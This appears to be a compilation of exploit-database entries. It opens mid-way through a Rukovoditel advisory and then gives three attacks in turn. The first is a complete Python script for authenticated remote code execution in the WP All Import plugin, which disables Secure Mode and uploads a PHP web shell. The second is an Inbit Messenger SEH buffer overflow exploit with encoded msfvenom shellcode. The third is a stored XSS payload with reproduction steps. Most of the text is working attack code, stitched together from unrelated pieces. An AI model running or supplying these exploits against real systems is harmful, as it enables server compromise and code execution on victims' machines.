AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;
cookie_test=please_accept_for_session;
app_login_redirect_to=module%3Ddashboard%2F
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)
## Proof and Exploit:
[href](https://streamable.com/i1qmfk)
## Time spent
`3:45`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/05/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://www.wpallimport.com/
# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)
# Version: <= 3.6.7 (tested: 3.6.7)
# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)
# CVE: CVE-2022-1565
#!/usr/bin/python
import requests
import re
import os
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.
# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it
#
# Please notice that I'm NOT the researcher who found this vulnerability
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7.
# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
# # # # # HOW THE EXPLOIT WORKS # # # # #
# 1. Prepare the zip file:
# - create a PHP file with your payload (e.g. reverse shell)
# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")
# - create a zip file with the payload
# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")
#
# 2. Login using an administrator account:
# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)
# - set the variable "admin_user" with the username of an administrator account
# - set the variable "admin_pass" with the password of an administrator account
#
# 3. Get the wpnonce using the get_wpnonce_upload_file() method
# - there are actually 2 types of wpnonce:
# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.
# This wpnonce allows us to change the plugin settings (check the step 4)
# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.
# This wpnonce allows us to upload the file
#
# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class
# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.
# The exploit will disable the Secure Mode.
# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).
# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)
# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.
#
# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method
# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.
# The response will contain a JSON that looks like this:
# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}
# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed
#
# 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method
#
# 7. Activate the payload using the activate_payload() method
# - you can define a method to activate the payload.
# There reason behind this choice is that this exploit does NOT provide any payload.
# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters
# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #
# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "Managed Imports" page
# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)
# I had to find a workaround and so I did, by exploiting this option.
# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7
# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #
# In order for the exploit to work please consider the following:
# 1. check the target_url and the admin credentials
# 2. check the path of the zip file and the name of the payload (they can be different)
# 3. if you're testing locally, try to set verify_ssl_certificate on False
# 4. you can use print_response(http_response) to investigate further
# Configure the following variables:
target_url = "https://vulnerable.wp/wordpress"  # Target base URL, no trailing slash
admin_user = "admin"  # Administrator username
admin_pass = "password"  # Administrator password
zip_file_to_upload = "/shell.zip"  # Path of the ZIP archive to upload (e.g. /root/shell.zip)
payload_file_name = "shell.php"  # Name of the payload inside that ZIP (e.g. a reverse shell)
verify_ssl_certificate = True  # Set to False only for local testing against an invalid certificate

# Derived values -- do NOT edit these
wp_login_url = "{}/wp-login.php".format(target_url)  # WordPress login form
wp_all_import_page_settings = "{}/wp-admin/admin.php?page=pmxi-admin-settings".format(target_url)  # plugin settings page
payload_url = "{}/wp-content/uploads/wpallimport/uploads/{}".format(target_url, payload_file_name)  # where the payload lands
re_enable_secure_mode = False  # presumably flipped when the exploit has to disable Secure Mode -- see the flow comments above
session = requests.Session()  # shared session so the WordPress auth cookies persist across requests
# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.
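class PluginSetting:
    """Settings scraped from the WP All Import settings page (pmxi-admin-settings).

    Three values are pulled out of the page HTML with regular expressions:
      * ``is_secure_mode_enabled`` -- the ``id="secure"`` checkbox is checked,
      * ``wpnonce_edit_settings``  -- hidden input ``_wpnonce_edit-settings``,
      * ``wpnonce_upload_file``    -- JS variable ``wp_all_import_security``.

    Each lookup aborts the script with SystemExit (message on stderr, exit
    status 1) when its pattern is not found; the original printed and called
    the site helper ``exit()``, which reported the failure with status 0.
    """

    # Regular-expression patterns; the attribute order inside the tags is
    # whatever the plugin renders, hence the permissive character classes.
    pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'
    pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'
    pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'

    # String annotations: the class does not need ``requests`` at definition
    # time, and only ``.text`` of the response object is ever read.
    http_response: "requests.Response"
    is_secure_mode_enabled: bool
    wpnonce_edit_settings: str
    wpnonce_upload_file: str

    def __init__(self, http_response: "requests.Response"):
        """Parse all three settings from ``http_response.text`` immediately."""
        self.http_response = http_response
        self.check_if_secure_mode_is_enabled()
        self.retrieve_wpnonce_edit_settings()
        self.retrieve_wpnonce_upload_file()

    def _find(self, pattern: str, failure_message: str) -> "re.Match[str]":
        """Search the page for ``pattern``; abort with ``failure_message`` if absent."""
        match = re.search(pattern, self.http_response.text)
        if match is None:
            # print_response(self.http_response)  # for debugging
            raise SystemExit(failure_message)
        return match

    def check_if_secure_mode_is_enabled(self):
        # Secure Mode is on when the id="secure" checkbox carries checked="checked":
        # <input type="checkbox" value="1" id="secure" name="secure" checked="checked">
        match = self._find(
            self.pattern_setting_secure_mode,
            "Something went wrong: could not retrieve plugin settings. Are you an administrator?",
        )
        self.is_secure_mode_enabled = "checked" in match.group()

    def retrieve_wpnonce_edit_settings(self):
        # Hidden input on the settings form, e.g.
        # <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9">
        # -> "052e2438f9" is the nonce for editing the settings.
        match = self._find(
            self.pattern_wpnonce_edit_settings,
            "Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?",
        )
        self.wpnonce_edit_settings = match.group(1)

    def retrieve_wpnonce_upload_file(self):
        # JavaScript variable in the page, e.g. var wp_all_import_security = 'dee75fdb8b';
        # -> "dee75fdb8b" is the nonce for the upload.
        match = self._find(
            self.pattern_wpnonce_upload_file,
            "Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable",
        )
        self.wpnonce_upload_file = match.group(1)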
def wp_login():
    """Authenticate against wp-login.php with the configured admin credentials.

    Posts through the module-level ``session`` so the cookies WordPress sets are kept for
    every later request. Redirects are deliberately not followed: a correct login answers
    302 (redirect to ``redirect_to``); any other status is treated as a failed login and
    the script exits.
    """
    form = {
        "log": admin_user,
        "pwd": admin_pass,
        "wp-submit": "Log in",
        "redirect_to": wp_all_import_page_settings,
        "testcookie": 1,
    }
    # Sent alongside the form; presumably the cookie the login form's "testcookie" check looks for.
    test_cookie = {"wordpress_test_cookie": "WP Cookie check"}
    print("Trying to login...")
    reply = session.post(url=wp_login_url, data=form, cookies=test_cookie, allow_redirects=False, verify=verify_ssl_certificate)
    if reply.status_code != 302:
        # print_response(reply) # for debugging
        print("Login failed. If the credentials are correct, try to print the response to investigate further.")
        exit()
    print("Logged in successfully!")
def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:
    """Submit the plugin settings form with the "secure" flag set to *set_to_enabled*.

    Args:
        set_to_enabled: True to turn Secure Mode on, False to turn it off.
        wpnonce: the ``_wpnonce_edit-settings`` value scraped from the settings page.

    Returns:
        The response to the settings POST (the re-rendered settings page), so the caller
        can feed it to PluginSetting and confirm the change.

    Exits the script on HTTP 403, which the original author attributes to a wrong nonce.
    """
    verb = "Enabling" if set_to_enabled else "Disabling"
    print(f"{verb} secure mode...")
    print("Edit settings wpnonce value: " + wpnonce)
    form = {
        "secure": int(bool(set_to_enabled)),
        "_wpnonce_edit-settings": wpnonce,
        "_wp_http_referer": wp_all_import_page_settings,
        "is_settings_submitted": 1,
    }
    reply = session.post(url=wp_all_import_page_settings, data=form, verify=verify_ssl_certificate)
    if reply.status_code != 403:
        return reply
    print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")
    # print_response(reply) # for debugging
    exit()
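def switch_back_to_secure_mode():
    """Re-enable the plugin's Secure Mode if the exploit turned it off.

    Fetches the settings page; if Secure Mode is already on, nothing is done. Otherwise the
    settings form is submitted with secure=1 and the returned page is re-parsed to confirm the
    change took effect; the script exits if it did not.

    Fix vs. the original: the settings GET now passes verify=verify_ssl_certificate like
    wp_login() and set_plugin_secure_mode() do. Without it a run with
    verify_ssl_certificate=False against a self-signed target raised here, i.e. after the
    upload had gone through, leaving Secure Mode disabled on the target.
    """
    global session
    print("Re-enabling secure mode...")
    response = session.get(url=wp_all_import_page_settings, verify=verify_ssl_certificate)
    plugin_setting = PluginSetting(response)
    if plugin_setting.is_secure_mode_enabled:
        print("Secure mode is already enabled")
        return
    response = set_plugin_secure_mode(set_to_enabled=True, wpnonce=plugin_setting.wpnonce_edit_settings)
    new_plugin_setting = PluginSetting(response)
    if not new_plugin_setting.is_secure_mode_enabled:
        print("Something went wrong: secure mode has not been re-enabled")
        # print_response(response) # for debugging
        exit()
    print("Secure mode has been re-enabled!")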
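def get_wpnonce_upload_file() -> str:
    """Return the upload nonce, disabling the plugin's Secure Mode first if it is on.

    Side effect: sets the module-level ``re_enable_secure_mode`` to True when this function
    turned Secure Mode off (so Main() knows to restore it), and to False when it was already
    off. Exits if the settings submission did not actually disable Secure Mode.

    Fix vs. the original: the settings GET now passes verify=verify_ssl_certificate like the
    other requests in this script, so a run with verify_ssl_certificate=False against a
    self-signed target no longer raises here.
    """
    global session, re_enable_secure_mode
    print("Checking if secure mode is enabled...")
    response = session.get(url=wp_all_import_page_settings, verify=verify_ssl_certificate)
    plugin_setting = PluginSetting(response)
    if not plugin_setting.is_secure_mode_enabled:
        re_enable_secure_mode = False
        print("Insecure mode is already enabled!")
        return plugin_setting.wpnonce_upload_file
    print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")
    response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)
    new_plugin_setting = PluginSetting(response)
    if new_plugin_setting.is_secure_mode_enabled:
        print("Something went wrong: secure mode has not been disabled")
        # print_response(response) # for debugging
        exit()
    print("Secure mode has been disabled!")
    re_enable_secure_mode = True
    return new_plugin_setting.wpnonce_upload_file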
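def upload_file(wpnonce_upload_file: str):
    """Upload ``zip_file_to_upload`` through the plugin's upload action.

    Args:
        wpnonce_upload_file: the ``wp_all_import_security`` nonce scraped from the settings
            page; it is appended to the settings URL as ``_wpnonce``.

    Returns:
        1 if the server answered HTTP 200 (the upload is assumed to have completed and the
        payload is expected at ``payload_url``), 0 for any other status. The response body
        is not parsed.

    Fixes vs. the original: the zip is opened in a ``with`` block so the handle is closed
    even if the POST raises (the original leaked it), and the request passes
    verify=verify_ssl_certificate like wp_login() does.
    """
    global session
    print("Uploading file...")
    print("Upload wpnonce value: " + wpnonce_upload_file)
    zip_file_name = os.path.basename(zip_file_to_upload)
    upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file
    data = { "name" : zip_file_name }
    with open(zip_file_to_upload, 'rb') as zip_handle:
        files = { "async-upload" : (zip_file_name, zip_handle) }
        response = session.post(url=upload_url, files=files, data=data, verify=verify_ssl_certificate)
    if response.status_code == 200:
        print("Server replied with HTTP 200 OK. The upload should be completed.")
        print("Payload should be here: " + payload_url)
        print("If you can't find the payload at this URL, try to print the response to investigate further")
        # print_response(response) # for debugging
        return 1
    print("Something went wrong during the upload. Try to print the response to investigate further")
    # print_response(response) # for debugging
    return 0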
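def activate_payload():
    """GET ``payload_url`` once to trigger the uploaded payload.

    Only the status code is checked: a non-200 answer is reported and the function returns;
    the response body is never inspected.

    Fix vs. the original: the request passes verify=verify_ssl_certificate like the rest of
    the script, so a self-signed target does not raise here after the upload succeeded.
    """
    global session
    print("Activating payload...")
    response = session.get(url=payload_url, verify=verify_ssl_certificate)
    if response.status_code != 200:
        print("Something went wrong: could not find payload at " + payload_url)
        # print_response(response) # for debugging
        return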
def print_response(response:requests.Response):
    """Debug helper: dump an HTTP status code and the raw body to stdout.

    Only referenced from the commented-out ``# print_response(...)`` lines above.
    """
    print(response.status_code, response.text, sep="\n")
# Entry Point
def Main():
    """Run the full chain: login, disable Secure Mode if needed, upload, restore, trigger."""
    print("Target: " + target_url)
    # NOTE(review): the admin password is echoed in cleartext here; redact it if output is captured.
    print("Credentials: " + admin_user + ":" + admin_pass)
    wp_login()
    # Disables Secure Mode when it is on (and records that in re_enable_secure_mode), then
    # hands back the nonce the upload action requires.
    upload_nonce = get_wpnonce_upload_file()
    uploaded = upload_file(upload_nonce)
    # Restore Secure Mode before triggering, whether or not the upload worked.
    if re_enable_secure_mode:
        switch_back_to_secure_mode()
    if uploaded:
        activate_payload()


Main()
# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
# Date: 11/08/2022
# Exploit Author: a-rey
# Vendor Homepage: http://www.inbit.com/support.html
# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
# Version: v4.6.0 - v4.9.0
# Tested on: Windows XP SP3, Windows 7, Windows 10
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, socket, struct, argparse, logging
"""
/opt/metasploit-framework/bin/msfvenom \
-p windows/messagebox \
ICON=WARNING \
TEXT="get wrecked" \
TITLE="LOLZ" \
EXITFUNC=thread \
-f py \
-v SHELLCODE \
-e x86/shikata_ga_nai \
-b '\x3E'
"""
SHELLCODE = b""
SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4"
SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14"
SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1"
SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd"
SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07"
SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29"
SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde"
SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e"
SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc"
SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43"
SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0"
SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee"
SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20"
SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50"
SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19"
SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77"
SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f"
SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd"
SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f"
SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86"
SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93"
SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40"
SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44"
SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e"
SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf"
SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3"
BANNER = """\033[0m\033[1;35m
╔═════════════════════════════════════════════════════════════════════╗
║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║
╚═════════════════════════════════════════════════════════════════════╝\033[0m
by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗
\033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║
\033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝
\033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝
\033[1;36m██║ ██║ ██║ ██║███████╗ ██║
\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝
\033[0m"""
BAD_BYTES = b"\x3e" # >
PAYLOAD_LENGTH = 2000
nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP
SEH = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET
# NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL
NULL_ACT_CTX_STUB = b"\x31\xC0\xBB\x00\x10"
NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48"
NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01"
NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B"
NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00"
NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89"
NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00"
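def exploit(targetIp:str, targetPort:int) -> None:
    """Build the SEH-overwrite packet and send it to the Inbit Messenger listener.

    Packet layout, in order: a leading ``<``, 40 bytes of ``A`` filler up to the SEH record,
    nSEH (short jump over the handler), the POP/POP/RET handler address from ipworks6.dll,
    NULL_ACT_CTX_STUB, a 32-byte NOP sled, SHELLCODE, then ``B`` padding up to PAYLOAD_LENGTH
    (the author notes 1600+ bytes are needed to overwrite beyond the top of the thread's stack).

    Args:
        targetIp: IPv4 address or resolvable hostname of the target.
        targetPort: TCP port of the Inbit Messenger listener.

    Calls sys.exit(-1) if the assembled packet contains a BAD_BYTES value, if the fixed parts
    alone already exceed PAYLOAD_LENGTH, or if connecting/sending fails.

    Changes vs. the original: sendall() replaces send() so a partial write cannot truncate the
    payload; the socket is a context manager so it is closed even when an error is raised;
    an oversized payload is reported instead of silently sent short (``b"B" * negative`` is
    empty); socket errors go through the logger instead of a traceback.
    """
    fixed = b"".join((
        b"<",
        b"A" * 40,
        nSEH,
        SEH,
        NULL_ACT_CTX_STUB,
        b"\x90" * 32,  # NOP sled for shikata_ga_nai decoder
        SHELLCODE,
    ))
    # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack
    padding = PAYLOAD_LENGTH - len(fixed)
    if padding < 0:
        logging.error(f"payload is {len(fixed)} bytes, which exceeds PAYLOAD_LENGTH={PAYLOAD_LENGTH}")
        sys.exit(-1)
    pkt = fixed + (b"B" * padding)
    # NOTE: check for bad bytes before touching the network
    for c in pkt:
        if c in BAD_BYTES:
            logging.error(f"found bad byte 0x{c:02x} in payload")
            sys.exit(-1)
    logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...")
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((targetIp, targetPort))
            s.sendall(pkt)  # send() may return after a partial write
    except OSError as err:
        logging.error(f"could not deliver payload to {targetIp}:{targetPort}: {err}")
        sys.exit(-1)
    logging.success("DONE")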
if __name__ == '__main__':
    # Command line; the banner doubles as the usage text.
    cli = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
    cli.add_argument('-t', '--target', help='target IP', type=str, required=True)
    cli.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883)
    opts = cli.parse_args()

    # Logger: coloured level names plus a custom SUCCESS level one above CRITICAL.
    logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
    logging.SUCCESS = logging.CRITICAL + 1
    for level, label in (
        (logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m'),
        (logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m'),
        (logging.WARNING, '\033[0m\033[1;33mWARN\033[0m'),
        (logging.INFO, '\033[0m\033[1;36mINFO\033[0m'),
    ):
        logging.addLevelName(level, label)

    def _log_success(msg, *args):
        """Emit *msg* at the custom SUCCESS level; exploit() calls this as logging.success()."""
        logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)

    logging.success = _log_success

    print(BANNER)
    exploit(opts.target, opts.port)
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-11-08
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################
Payload used: "><script>alert("XSS")</script>  (the leading "> is there to break out of an HTML attribute/tag in case the stored Name is echoed inside one)
1. Visit the URL http://localhost/bsms_ci/
2. Log in with admin credentials.
3. Navigate to User Management.
4. Click "Add New System User".
5. Enter the payload in the "Name" input field.
6. Click Save.
7. Visit http://localhost/bsms_ci/index.php/user
8. The stored XSS payload executes when the user list is rendered.